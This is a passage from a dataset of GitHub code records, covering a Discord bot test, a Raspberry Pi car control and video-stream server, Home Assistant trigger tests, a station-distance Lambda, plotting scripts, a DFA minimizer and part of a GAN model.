create_logger(__file__)\n\n\n@pytest.mark.asyncio\nasync def test_bot_command_decorator():\n \"\"\"\n tests that the bot command decorator works correctly\n \"\"\"\n mock_logger = MagicMock()\n\n @bot_command(\"mycommand\")\n class MyBotCommand:\n @staticmethod\n async def default(ctx, *args, **kwargs):\n mock_logger(\"default\")\n await ctx.send(\"yes\")\n\n @staticmethod\n async def option_one(ctx, *args, **kwargs):\n mock_logger(\"option one\")\n\n count = 0\n for command in bot.commands:\n if command.name in GLOBAL_COMMAND_TABLE:\n count += 1\n\n assert count == len(GLOBAL_COMMAND_TABLE.items()) > 0\n assert \"testcommand\" in GLOBAL_COMMAND_TABLE\n assert \"mycommand\" in GLOBAL_COMMAND_TABLE\n assert \"testcommand\" in bot.all_commands\n assert \"mycommand\" in bot.all_commands\n assert \"denounce\" in bot.all_commands\n\n await MyBotCommand(AsyncMock(), \"one\", \"four\", 3)\n await MyBotCommand(AsyncMock())\n\n mock_logger.assert_has_calls(\n [call(\"default\"), call(\"option one\")], any_order=True\n )\n\n\ndef test_help_string_contained():\n \"\"\"\"\"\"\n assert bot.all_commands[\"testcommand\"].help == \"this is a testing command\"\n", "repo_name": "stephend017/discord_ritoman", "sub_path": "tests/test_bot/test_bot_command_decorator.py", "file_name": "test_bot_command_decorator.py", "file_ext": "py", "file_size_in_byte": 1466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "discord_ritoman.utils.create_logger", "line_number": 7, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 15, "usage_type": "call"}, {"api_name": "discord_ritoman.bot.bot_command.bot_command", "line_number": 17, "usage_type": "call"}, {"api_name": "discord_ritoman.bot.bot.bot.commands", "line_number": 29, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 29, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE", "line_number": 30, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE.items", "line_number": 33, "usage_type": "call"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE", "line_number": 33, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE", "line_number": 34, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE", "line_number": 35, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot.bot.all_commands", "line_number": 36, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 36, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot.bot.all_commands", "line_number": 37, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 37, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot.bot.all_commands", "line_number": 38, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 38, "usage_type": "name"}, {"api_name": "unittest.mock.AsyncMock", "line_number": 40, "usage_type": "call"}, {"api_name": "unittest.mock.AsyncMock", "line_number": 41, "usage_type": "call"}, {"api_name": "unittest.mock.call", "line_number": 44, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot.all_commands", "line_number": 50, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 
50, "usage_type": "name"}]} +{"seq_id": "20902471439", "text": "#!/usr/bin/python\nimport socket\nimport zmq\nimport time\nfrom threading import Thread\nimport cv2\nimport base64\n\ntry:\n from picar import PiCar\nexcept:\n print(\"No Picar did not load\")\n\nclientaddr = '192.168.1.151'\nclientaddr = '192.168.1.156'\nclientaddr = '192.168.0.146'\nclientaddr = '192.168.0.169'\n\n#TODO: include some basic safety protocols to ensure car doesn't crash\n\nclass Reciever(Thread):\n def __init__(self, addr=\"\", port = 5000):\n Thread.__init__(self, daemon=True)\n\n self.size = 1024\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #???\n sock.bind((addr,port))\n sock.listen(5) \n self.client,self.address = sock.accept()\n print(\"New client\")\n self.cmd = None\n self.start()\n\n def recv_cmd(self):\n self.cmd = self.client.recv(self.size).rstrip().decode()\n return cmd\n\n def read(self):\n cmd = self.cmd\n self.cmd = None\n return cmd\n\n def run(self):\n while True:\n self.cmd = self.client.recv(self.size).rstrip().decode()\n \n\n\nclass FootageStream(Thread):\n '''Continuously serves requests for the latest frame'''\n \n def __init__(self, camera,addr,port=5555):\n print(\"initializing live stream\")\n Thread.__init__(self)\n self.camera = camera\n context = zmq.Context()\n self.sock = context.socket(zmq.PUB)\n self.sock.connect('tcp://{}:{}'.format(addr[0],port)) #??? why not bind\n \n print(\"starting thread\")\n self._running = False\n self.start()\n\n def run(self):\n '''Send images to the connected socket'''\n self._running = True\n while(self._running):\n #TODO: adjust this to match the picamera commands\n ret,image = self.camera.read()\n #image = cv2.resize(frame, (640,480))\n \n #if self.mode == 'opencv':\n # pass #TODO: impliment open cv modes\n \n # send image to client\n encoded, buffer = cv2.imencode('.jpg', image)\n jpg_as_text = base64.b64encode(buffer)\n #TODO: send as a numpy array\n self.sock.send(jpg_as_text)\n \n # Runs after close\n self.sock.shutdown()\n self.sock.close()\n\n def close(self):\n self._running=False\n \n \ndef main():\n '''Start the picar and wait for commands'''\n print(\"Initializing reciever\")\n reciever = Reciever()\n print(\"Initializing car\")\n with PiCar() as car:\n stream = FootageStream(camera=car.camera,addr = reciever.address)\n while True: #TODO: detect when socket is broken properly\n #print(\"command?\")\n cmd = reciever.read()\n\n '''\n # Safety stop\n dist = car.sonar.ping()\n if car._mode:\n if dist<.2:\n car._mode = None\n car._stopped = True\n car.ebrake()\n cmd = None\n\n '''\n \n # Override commands here\n if cmd == \"all_stop\":\n car.all_stop()\n car._mode=None\n\n if cmd ==\"follow_line\":\n if car._mode=='follow_line':\n car._mode=None\n car.all_stop()\n else:\n car._mode = 'follow_line'\n follow = car.follow_line(darkLine=False,\n speed=1,\n gain=(10,60,0),\n nHist = 100,\n runTime = 1,\n coastTime = .5,\n maxAng = 30\n )\n\n \n # Continue running current mode\n if car._mode == None:\n car.run_cmd(cmd)\n elif car._mode == 'follow_line':\n try:\n next(follow)\n except:\n print(\"Couldnt follow line\")\n car._mode=None\n elif car._mode == 'track_object':\n pass\n else:\n pass\n \n\n stream.close()\n car.all_stop()\n\n\nif __name__==\"__main__\":\n main()\n \n", "repo_name": "jimingkang/adeept_picar-bv2.0", "sub_path": "192_168_0_172/v3/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4473, "program_lang": "python", "lang": "en", 
"doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "threading.Thread", "line_number": 21, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 23, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 23, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 27, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 27, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 27, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 28, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 28, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 51, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 56, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 56, "usage_type": "name"}, {"api_name": "zmq.Context", "line_number": 58, "usage_type": "call"}, {"api_name": "zmq.PUB", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 78, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 79, "usage_type": "call"}, {"api_name": "picar.PiCar", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "37582838640", "text": "\"\"\"The tests for Media player device triggers.\"\"\"\nimport pytest\n\nimport homeassistant.components.automation as automation\nfrom homeassistant.components.media_player import DOMAIN\nfrom homeassistant.const import (\n STATE_IDLE,\n STATE_OFF,\n STATE_ON,\n STATE_PAUSED,\n STATE_PLAYING,\n)\nfrom homeassistant.helpers import device_registry\nfrom homeassistant.setup import async_setup_component\n\nfrom tests.common import (\n MockConfigEntry,\n assert_lists_same,\n async_get_device_automations,\n async_mock_service,\n mock_device_registry,\n mock_registry,\n)\nfrom tests.components.blueprint.conftest import stub_blueprint_populate # noqa\n\n\n@pytest.fixture\ndef device_reg(hass):\n \"\"\"Return an empty, loaded, registry.\"\"\"\n return mock_device_registry(hass)\n\n\n@pytest.fixture\ndef entity_reg(hass):\n \"\"\"Return an empty, loaded, registry.\"\"\"\n return mock_registry(hass)\n\n\n@pytest.fixture\ndef calls(hass):\n \"\"\"Track calls to a mock service.\"\"\"\n return async_mock_service(hass, \"test\", \"automation\")\n\n\nasync def test_get_triggers(hass, device_reg, entity_reg):\n \"\"\"Test we get the expected triggers from a media player.\"\"\"\n config_entry = MockConfigEntry(domain=\"test\", data={})\n config_entry.add_to_hass(hass)\n device_entry = device_reg.async_get_or_create(\n config_entry_id=config_entry.entry_id,\n connections={(device_registry.CONNECTION_NETWORK_MAC, \"12:34:56:AB:CD:EF\")},\n )\n entity_reg.async_get_or_create(DOMAIN, \"test\", \"5678\", device_id=device_entry.id)\n\n trigger_types = {\"turned_on\", \"turned_off\", \"idle\", \"paused\", \"playing\"}\n expected_triggers = [\n {\n \"platform\": \"device\",\n \"domain\": DOMAIN,\n \"type\": trigger,\n \"device_id\": device_entry.id,\n \"entity_id\": f\"{DOMAIN}.test_5678\",\n }\n for trigger in trigger_types\n ]\n triggers = await async_get_device_automations(hass, \"trigger\", device_entry.id)\n assert_lists_same(triggers, expected_triggers)\n\n\nasync def test_if_fires_on_state_change(hass, calls):\n \"\"\"Test triggers firing.\"\"\"\n hass.states.async_set(\"media_player.entity\", STATE_OFF)\n\n data_template = (\n \"{label} - {{{{ trigger.platform}}}} - \"\n \"{{{{ 
trigger.entity_id}}}} - {{{{ trigger.from_state.state}}}} - \"\n \"{{{{ trigger.to_state.state}}}} - {{{{ trigger.for }}}}\"\n )\n trigger_types = {\"turned_on\", \"turned_off\", \"idle\", \"paused\", \"playing\"}\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\n \"platform\": \"device\",\n \"domain\": DOMAIN,\n \"device_id\": \"\",\n \"entity_id\": \"media_player.entity\",\n \"type\": trigger,\n },\n \"action\": {\n \"service\": \"test.automation\",\n \"data_template\": {\"some\": data_template.format(label=trigger)},\n },\n }\n for trigger in trigger_types\n ]\n },\n )\n\n # Fake that the entity is turning on.\n hass.states.async_set(\"media_player.entity\", STATE_ON)\n await hass.async_block_till_done()\n assert len(calls) == 1\n assert (\n calls[0].data[\"some\"]\n == \"turned_on - device - media_player.entity - off - on - None\"\n )\n\n # Fake that the entity is turning off.\n hass.states.async_set(\"media_player.entity\", STATE_OFF)\n await hass.async_block_till_done()\n assert len(calls) == 2\n assert (\n calls[1].data[\"some\"]\n == \"turned_off - device - media_player.entity - on - off - None\"\n )\n\n # Fake that the entity becomes idle.\n hass.states.async_set(\"media_player.entity\", STATE_IDLE)\n await hass.async_block_till_done()\n assert len(calls) == 3\n assert (\n calls[2].data[\"some\"]\n == \"idle - device - media_player.entity - off - idle - None\"\n )\n\n # Fake that the entity starts playing.\n hass.states.async_set(\"media_player.entity\", STATE_PLAYING)\n await hass.async_block_till_done()\n assert len(calls) == 4\n assert (\n calls[3].data[\"some\"]\n == \"playing - device - media_player.entity - idle - playing - None\"\n )\n\n # Fake that the entity is paused.\n hass.states.async_set(\"media_player.entity\", STATE_PAUSED)\n await hass.async_block_till_done()\n assert len(calls) == 5\n assert (\n calls[4].data[\"some\"]\n == \"paused - device - media_player.entity - playing - paused - None\"\n )\n", "repo_name": "fpetillo/home-assistant", "sub_path": "tests/components/media_player/test_device_trigger.py", "file_name": "test_device_trigger.py", "file_ext": "py", "file_size_in_byte": 4637, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tests.common.mock_device_registry", "line_number": 30, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tests.common.mock_registry", "line_number": 36, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tests.common.async_mock_service", "line_number": 42, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tests.common.MockConfigEntry", "line_number": 47, "usage_type": "call"}, {"api_name": "homeassistant.helpers.device_registry.CONNECTION_NETWORK_MAC", "line_number": 51, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.device_registry", "line_number": 51, "usage_type": "name"}, {"api_name": "homeassistant.components.media_player.DOMAIN", "line_number": 53, "usage_type": "argument"}, {"api_name": "homeassistant.components.media_player.DOMAIN", "line_number": 59, "usage_type": "name"}, {"api_name": "homeassistant.components.media_player.DOMAIN", "line_number": 62, "usage_type": "name"}, {"api_name": "tests.common.async_get_device_automations", "line_number": 66, "usage_type": 
"call"}, {"api_name": "tests.common.assert_lists_same", "line_number": 67, "usage_type": "call"}, {"api_name": "homeassistant.const.STATE_OFF", "line_number": 72, "usage_type": "argument"}, {"api_name": "homeassistant.setup.async_setup_component", "line_number": 81, "usage_type": "call"}, {"api_name": "homeassistant.components.automation.DOMAIN", "line_number": 83, "usage_type": "attribute"}, {"api_name": "homeassistant.components.automation", "line_number": 83, "usage_type": "name"}, {"api_name": "homeassistant.components.automation.DOMAIN", "line_number": 85, "usage_type": "attribute"}, {"api_name": "homeassistant.components.automation", "line_number": 85, "usage_type": "name"}, {"api_name": "homeassistant.components.media_player.DOMAIN", "line_number": 89, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_ON", "line_number": 105, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_OFF", "line_number": 114, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_IDLE", "line_number": 123, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_PLAYING", "line_number": 132, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_PAUSED", "line_number": 141, "usage_type": "argument"}]} +{"seq_id": "26206341834", "text": "\"\"\"\nDer selbe Code wie \"lambda_function.py\" nur das hier mit der DDB gearbeitet wird.\n\"\"\"\n\nimport math\nimport json\nimport boto3\n\ndef calculate_distance(lat1, lon1, lat2, lon2):\n # Umrechnung in Radianten\n lat1 = math.radians(lat1)\n lon1 = math.radians(lon1)\n lat2 = math.radians(lat2)\n lon2 = math.radians(lon2)\n\n # Formel zur Berechnung der Entfernung\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n distance = 6371 * c # Radius der Erde in Kilometern\n\n return round(distance)\n\ndef read_dynamodb_table(table_name):\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table(table_name)\n\n response = table.scan()\n items = response['Items']\n\n while 'LastEvaluatedKey' in response:\n response = table.scan(ExclusiveStartKey=response['LastEvaluatedKey'])\n items.extend(response['Items'])\n\n return items\n\ndef lambda_handler(event, context):\n from_station = event['pathParameters']['from_station']\n to_station = event['pathParameters']['to_station']\n\n table_name = 'db_table'\n dynamodb_data = read_dynamodb_table(table_name)\n\n from_station_data = next((item for item in dynamodb_data if item['DS100'] == from_station), None)\n to_station_data = next((item for item in dynamodb_data if item['DS100'] == to_station), None)\n\n if from_station_data and to_station_data:\n distance = calculate_distance(from_station_data['Latitude'], from_station_data['Longitude'],\n to_station_data['Latitude'], to_station_data['Longitude'])\n response = {\n \"from\": from_station_data['NAME'],\n \"to\": to_station_data['NAME'],\n \"distance\": distance,\n \"unit\": \"km\"\n }\n else:\n response = {\n \"message\": \"One or both stations not found\"\n }\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(response)\n }\n", "repo_name": "Fabs2210/db_distance_calc", "sub_path": "app/dynamodb_app/lambda_function_ddb.py", "file_name": "lambda_function_ddb.py", "file_ext": "py", "file_size_in_byte": 2045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.radians", "line_number": 11, 
"usage_type": "call"}, {"api_name": "math.radians", "line_number": 12, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 13, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 14, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 19, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 20, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "boto3.resource", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "40518336111", "text": "from matplotlib import pyplot\nimport pandas as pd\nimport seaborn as sns\nurl = 'https://raw.githubusercontent.com/resbaz/r-novice-gapminder-files/master/data/gapminder-FiveYearData.csv'\ndf1 = pd.read_csv(url)\nprint(df1)\ndf1.to_csv('Dataset.csv',index=False)\ndf2 = pd.pivot_table(df1,values='lifeExp',index='continent',columns='year')\nprint(df2)\npyplot.figure(figsize=(15,10))# width by height\n# This shows the average life expectancy for each year\nsns.heatmap(df2,annot=True,fmt=\".2f\").get_figure().savefig('Seaborn_HeatMap.png')\n", "repo_name": "mrUnlimited2020/HeatMap-plot", "sub_path": "heatmap.py", "file_name": "heatmap.py", "file_ext": "py", "file_size_in_byte": 529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.pivot_table", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "13055074316", "text": "import matplotlib.pyplot as mplt\nimport numpy as np\n\n# Task 1\nx = np.arange(0, 21)\nprint(x)\n\nmy_mean = np.mean(x)\nprint(\"The mean is \", my_mean)\n\nmy_std = np.std(x)\nprint(\"The standard deviation is \", my_std)\n\nvari = np.var(x)\nprint(\"The variance of the marks is \", vari)\n\n# Task 2 - Histogram\nnums = [0.5, 0.7, 1, 1.2, 1.3, 2.1]\nbins = [0, 1, 2, 3]\nx_pos = [i for i, _ in enumerate(nums)]\nmplt.hist(x_pos, bins, color='gold')\nmplt.xlabel(\"Amount of Numbers\")\nmplt.ylabel(\"Amount of Bins\")\nmplt.title(\"Numbers against the bins\")\nmplt.xticks(x_pos, nums)\nmplt.show()\n", "repo_name": "jordan-hess/machine-learning-challenge", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.arange", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.title", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "30230172869", "text": "import networkx as nx\nfrom graphviz import Source\nfrom graphviz import Digraph\n\nfrom Automata import Automata\n\n\ndef get_key (dict, value):\n return [k for k, v in dict.items() if v == value]\n\nclass DFA:\n\n def __init__(self):\n self.states = set() ## 状态集合\n self.start_state = 0 ## 起始状态集合\n self.final_states = set() ## 终止状态集合\n self.transitions = {} ## 状态转移矩阵\n self.alphabet = set() ## 可接受的字符\n\n def add_state(self, state):\n self.states.add(state)\n\n def add_start_state(self, state):\n self.start_state = state\n\n def add_final_state(self, state):\n self.final_states.add(state)\n\n def add_symbol(self, symbol):\n self.alphabet.add(symbol)\n\n def add_transition(self, f_state, symbol, t_state):\n if f_state not in self.transitions:\n self.transitions.update({f_state: {}})\n\n if t_state not in self.transitions[f_state]:\n self.transitions[f_state].update({t_state: set()})\n\n self.transitions[f_state][t_state].add(symbol)\n\n def print(self):\n print(\"States:\", self.states)\n print(\"Start State:\", self.start_state)\n print(\"Final States:\", self.final_states)\n print(\"Transitions:\", self.transitions)\n print(\"Alphabet:\", self.alphabet)\n\n def draw(self, filename=None):\n # 实例化一个Digraph对象(有向图),name:生成的图片的图片名,format:生成的图片格式\n G = Digraph(name=\"DFA\", comment=\"test\", format=\"png\")\n for i in self.states:\n if i in self.final_states:\n s = 'doublecircle'\n else:\n s = 'circle'\n if i == self.start_state:\n f = 'green'\n else:\n f = 'gray'\n # s = 'doublecircle' if i in self.final_states else 'circle'\n # f = 'grey' if i == self.start_state else 'green'\n G.node(name = str(i),label = str(i),color = f,shape = s)\n # G.add_node(i, shape=s, fillcolor=f, style='filled')\n \n\n for i, d in self.transitions.items():\n for k, v in d.items():\n l = ','.join(v)\n G.edge(str(i), str(k), label=l)\n print(G.source)\n \n # 画图,filename:图片的名称,若无filename,则使用Digraph对象的name,默认会有gv后缀\n # directory:图片保存的路径,默认是在当前路径下保存\n # G.view(filename=\"DFA\")\n \n # 跟view一样的用法(render跟view选择一个即可),一般用render生成图片,不使用view=True,view=True用在调试的时候\n G.render(filename='DFA',view=True)\n \n ## 这个函数是用来找到最小划分的\n def hopcroft(self):\n P = [ self.final_states, self.states.difference(self.final_states) ]\n ## P一开始是起始态和终止态的划分,最后经过迭代变成最终的划分\n W = [ self.final_states ]\n\n while len(W) > 0:\n A = W.pop() ## 注意这东西pop出来的是一个set\n \n for c in self.alphabet:\n X = set()\n for f_state, t_state in self.transitions.items():\n ## f是起始状态,t是接受字母,以及接受字母后跳转到的状态,一个f可能有多个t\n for k, s in t_state.items():\n if c in s and k in A:\n X.update(set([f_state]))\n ## update方法是合并集合\n ## 如果存在一个字母表中的字符使得这个状态接受这个字符后跳到终态,那么将这个状态合并进X\n ## X是接受一个字符可以到终态的集合\n\n for Y in P:\n if X.intersection(Y) != set() and Y.difference(X) != set():\n ## 当现在的分解的list中存在一个set,以及字母表中的一个元素,使得这个set经过这个元素\n ## 后,跳转到的状态的集合不全在分解的集合的子集中,就把Y分解,重新加入结果集\n P.append(X.intersection(Y))\n P.append(Y.difference(X))\n P.remove(Y)\n\n ## 之后我们还需要更新W\n if Y in W:\n W.append(X.intersection(Y))\n W.append(Y.difference(X))\n W.remove(Y)\n else:\n if len(X.intersection(Y)) <= len(Y.difference(X)):\n 
W.append(X.intersection(Y))\n else:\n W.append(Y.difference(X))\n # print('hopcroft', P)\n ## 通过这个算法,可以产出最小化划分\n return P\n\n def minimize(self):\n min_states = self.hopcroft()\n print(\"min_states\",min_states)\n for state_set in min_states:\n ## state_set是一个set\n\n if len(state_set) > 1:\n min_state = min(state_set)\n ## 以set中最小的作为化简后的DFA的新的状态\n for state in state_set:\n if(self.transitions.__contains__(state)):\n ## state是一个数\n # print(\"state\", state)\n # print(\"1\", self.transitions[state])\n # # print(\"2\", type(self.transitions[min_state]))\n # print(\"2\", self.transitions[min_state])\n # print(\"3\", self.transitions)\n self.transitions[min_state].update(self.transitions[state])\n ## 更新化简后的DFA的新的状态的状态转移矩阵中的一条记录\n ## transitions是个三元组\n if state != min_state:\n self.transitions.pop(state)\n self.states.discard(state)\n changes = []\n for s, _ in self.transitions.items():\n for t, _ in self.transitions[s].items():\n if t in state_set and t != min_state:\n changes.append((t, s))\n ## 我们之前将新状态用原来状态的组合中的最小的代替,所以状态转移中需要添加上,没有被\n ## 代替的状态到其他状态的跳转\n \n for t, s in changes:\n self.transitions[s][min_state] = self.transitions[s].pop(t)\n\n if self.start_state in state_set:\n self.start_state = min_state\n \n changes = []\n for fs in self.final_states:\n if fs in state_set:\n changes.append(fs)\n\n for s in changes:\n self.final_states.discard(fs)\n \n ## DFA代码化\n def DFACode(self,variables,word=''):\n res = \"\"\n t_tmp=''\n result=[]\n for i in range(len(variables)):\n if variables[i] not in self.alphabet:\n print(\"error\")\n result.append('error')\n break\n if i == 0:\n s = {variables[i]}\n # temp是初态接受这个字母到达的状态的集合,是list\n temp = get_key(self.transitions[self.start_state],s)\n if len(temp) == 0:\n print(\"error\")\n result.append('error')\n break\n else:\n t_tmp = temp[0]\n # print(t_tmp)\n else:\n s = {variables[i]}\n # print(s)\n # print(t_tmp)\n # temp是初态接受这个字母到达的状态的集合,是list\n temp = get_key(self.transitions[t_tmp],s)\n if len(temp) == 0:\n print(\"error\")\n result.append('error')\n t_tmp=0\n break\n else:\n t_tmp = temp[0]\n # if(t_tmp in self.final_states):\n # res+=variables[i]\n # print(t_tmp)\n if t_tmp in self.final_states:\n if(word!='' and 'K' in variables):\n res='<'+'Keyword,'+word+'>'\n elif(word==''):\n if(variables=='×'):\n variables='*'\n elif(variables=='{'):\n variables='('\n elif(variables=='}'):\n variables=')'\n res='<'+variables+'>'\n else:\n res = \"<\" + \"Var,\" + word + \">\"\n result.append(res)\n print(res)\n return result\n\n @staticmethod\n def generateDFA(dfa:Automata):\n dfa_1=DFA()\n dfa_1.states = dfa.states\n dfa_1.start_state = dfa.start_states\n dfa_1.final_states = dfa.final_states\n dfa_1.transitions = dfa.transitions\n dfa_1.alphabet = dfa.alphabet\n\n return dfa_1\n\n \n \n", "repo_name": "FanqingM/Compilation-principle", "sub_path": "minimizer.py", "file_name": "minimizer.py", "file_ext": "py", "file_size_in_byte": 9352, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "graphviz.Digraph", "line_number": 50, "usage_type": "call"}, {"api_name": "Automata.Automata", "line_number": 221, "usage_type": "name"}]} +{"seq_id": "27139338751", "text": "import numpy as np\r\nimport torch\r\nimport os\r\nfrom collections import OrderedDict\r\nfrom torch.autograd import Variable\r\nimport util.util as util\r\nfrom .base_model import BaseModel\r\nfrom . 
import networks\r\nfrom .losses import init_loss\r\nimport torch.nn.functional as F\r\nfrom .introvae import *\r\n\r\nimport pdb\r\n\r\n\r\ntry:\r\n\txrange # Python2\r\nexcept NameError:\r\n\txrange = range # Python 3\r\n\r\nclass ConditionalGAN(BaseModel):\r\n\tdef name(self):\r\n\t\treturn 'ConditionalGANModel'\r\n\r\n\tdef initialize(self, opt):\r\n\t\tself.opt = opt\r\n\t\tBaseModel.initialize(self, opt)\r\n\t\tself.isTrain = opt.isTrain\r\n\t\t# define tensors\r\n\t\tself.input_A = self.Tensor(opt.batchSize, opt.input_nc,\r\n\t\t\t\t\t\t\t\t opt.fineSize, opt.fineSize)\r\n\t\tself.input_B = self.Tensor(opt.batchSize, opt.output_nc,\r\n\t\t\t\t\t\t\t\t opt.fineSize, opt.fineSize)\r\n\r\n\t\t# load/define networks\r\n\t\t# Temp Fix for nn.parallel as nn.parallel crashes oc calculating gradient penalty\r\n\t\tuse_parallel = 0\r\n\r\n\t\tif opt.which_model_netG == 'introAE':\r\n\t\t\tstr_to_list = lambda x: [int(xi) for xi in x.split(',')]\r\n\t\t\tself.netG = IntroAE(norm=opt.norm, gpuId = opt.gpu_ids,cdim=3, hdim=opt.hdim, channels=str_to_list(opt.channels), image_size=opt.output_height)\r\n\t\t\tself.old_lr = opt.lr\r\n\t\t\tif len(opt.gpu_ids) > 0:\r\n\t\t\t\tself.netG.cuda(opt.gpu_ids[0])\r\n\t\t\tif not self.isTrain or opt.continue_train:\r\n\t\t\t\tself.load_network(self.netG.encoder, 'G_Encoder1', opt.which_epoch)\r\n\t\t\t\tself.load_network(self.netG.decoder, 'G_Decoder', opt.which_epoch)\r\n\t\t\tself.optimizer_G_E1 = optim.Adam(self.netG.encoder.parameters(), lr=opt.lr)\r\n\t\t\tself.optimizer_G_D = optim.Adam(self.netG.decoder.parameters(), lr=opt.lr)\r\n\t\t\tself.contentLoss = init_loss(opt, self.Tensor)\r\n\t\t\tprint('---------- Networks initialized -------------')\r\n\t\t\tnetworks.print_network(self.netG.encoder)\r\n\t\t\tnetworks.print_network(self.netG.decoder)\r\n\t\t\tprint('-----------------------------------------------')\t\r\n\t\t\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. \\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\tdef set_input(self, input):\r\n\t\tAtoB = self.opt.which_direction == 